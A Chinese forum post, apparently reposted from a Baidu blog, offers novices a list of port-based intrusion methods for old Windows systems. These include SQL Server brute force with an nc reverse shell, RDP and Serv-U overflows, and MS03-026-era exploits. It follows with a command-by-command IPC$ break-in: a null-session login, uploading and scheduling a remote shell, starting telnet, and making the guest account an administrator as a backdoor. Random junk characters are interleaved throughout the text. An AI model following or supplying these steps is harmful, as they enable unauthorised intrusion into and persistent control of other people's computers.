TA的每日心情 | 衰 2019-8-18 09:37 |
---|
签到天数: 2 天 [LV.1]初来乍到
|
来源:hi.baidu
$ F: v7 S) B& B$ i, q2 {希望对新手入侵有帮助!
! J0 u2 w ?, x8 s% P, d 1. 1433端口入侵
, c& ?2 ?6 N8 O$ e6 F scanport.exe 查有1433的机器
; ~: [* k# P8 s, Z SQLScanPass.exe 进行字典暴破(字典是关键)
4 w7 h" a* G- j: ?3 J 最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。! d' I G7 B2 o: A
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
2 Z8 ?" O3 T+ o3 J2 B (以上反向的,测试成功)
& L3 Z/ L- A$ S sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
) d4 Y b- B Y$ t, Z5 E+ D, T: j 2. 4899端口入侵
! d# E/ T* M' J3 d+ k 用4899过滤器.exe,扫描空口令的机器
$ s7 a* o# Y" s4 V+ F) y: M+ [ 3. 3899的入侵8 U$ _6 Y0 S T) d' t+ O0 ~$ w* A+ _
对很早的机器,可以试试3389的溢出(win3389ex.exe)
4 E9 x' T& a3 |4 | 对2000的机器,可以试试字典暴破。(tscrack.exe)
/ B) J0 |6 m; A6 A& ` 4. 80入侵0 q6 O- p- k: P! K3 x+ b( ~, l
对sp3以前的机器,可以用webdav入侵;
8 f; J6 m8 }, P) [7 L) g, ] 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
) s( d' c, ^. f 可以利用SQL进行注入。(啊D的注入软件)。
2 k5 u* _: S* w$ K5 L! f0 [ 5. serv-u入侵(21端口)8 C) G/ @: Z- M8 p
对5. 004及以下系统,可用溢出入侵。(serv5004.exe)# u6 }. z0 E2 D" u6 r
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
$ G6 U5 `- K1 Y5 \$ Z6 Q 对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)0 y* w/ c, |/ g/ ]. M0 m; x- d
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码
6 {( O- e) a: W% `/ V& Z" u w 6. 554端口
: y' l' b9 Q9 ~: [8 E 用real554.exe入侵。1 a5 x0 D( _. @( ^
7. 6129端口1 {0 Y- ~0 Z' j/ D z0 A; M
用DameWare6129.exe入侵。& P; m2 I0 K% w. e( z2 A
8. 系统漏洞
! |2 b, t5 i5 y- ~ 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。6 f& z6 n# T. e" m; ?1 k0 n
9. 3127等端口
0 g4 e) H5 K% X |6 f5 d* M: |! `/ }/ A$ E% e% I
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
- l+ i6 Z- u% E7 B& P 10. 其他入侵
& g+ X0 _+ f( N, \ 利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
0 @% C6 y6 v6 z# P
" F- x2 p- a- y/ g% U8 _ 经典IPC$入侵; M( o2 _5 S- r
' d3 d9 t" X. x 1. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators"* F) r0 B: U5 ^& S; P7 g
这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
6 b7 C b+ B8 a 2. C:\>copy srv.exe $">\\127.0.0.1\admin$& N- _& @5 w9 [( [: ?/ W
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
3 z7 E* U4 j [2 ~2 z O { 3. C:\>net time file://127.0.0.1/
/ ?$ {* P+ h* Z 查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
+ y+ t9 i. K1 W+ _( g, a 4. C:\>at file://127.0.0.1/ 11:05 srv.exe3 @# U. E; B3 ] S% j! r
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.
$ l, K2 `" f% V/ _( I 5. C:\>net time file://127.0.0.1/
4 \# y& r0 q4 b- l$ ` 再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。6 Y& y& M! }9 E+ L# Z
6. C:\>telnet 127.0.0.1 99
7 H; f' V9 B3 k+ e9 d0 {) l; X7 L 这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。+ Q, O% _5 o5 R5 H7 M1 p
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了" J) E8 @+ x% o. q4 C: E6 [
7.C:\>copy ntlm.exe $">\\127.0.0.1\admin$5 L& D! t+ }& L# A. J
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
- N2 w4 \; k. @, y 8. C:\WINNT\system32>ntlm- X" [0 r" c4 B9 i2 K% w. W4 v
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!- b5 w6 |) T, x/ \. k! r
9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)为了以防万一,我们再把guest激活加到管理组
" q$ b# G) G- {2 R0 A 10. C:\>net user guest /active:yes
$ i! b E8 r% Y 将对方的Guest用户激活0 y8 I" ^" S6 U, z
11. C:\>net user guest 1234( [4 h3 E$ H7 l
将Guest的密码改为1234,或者你要设定的密码
# Z/ b8 i- m9 J* [ {$ K 12. C:\>net localgroup administrators guest /add4 F: V4 A* V5 K2 A
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机) |
|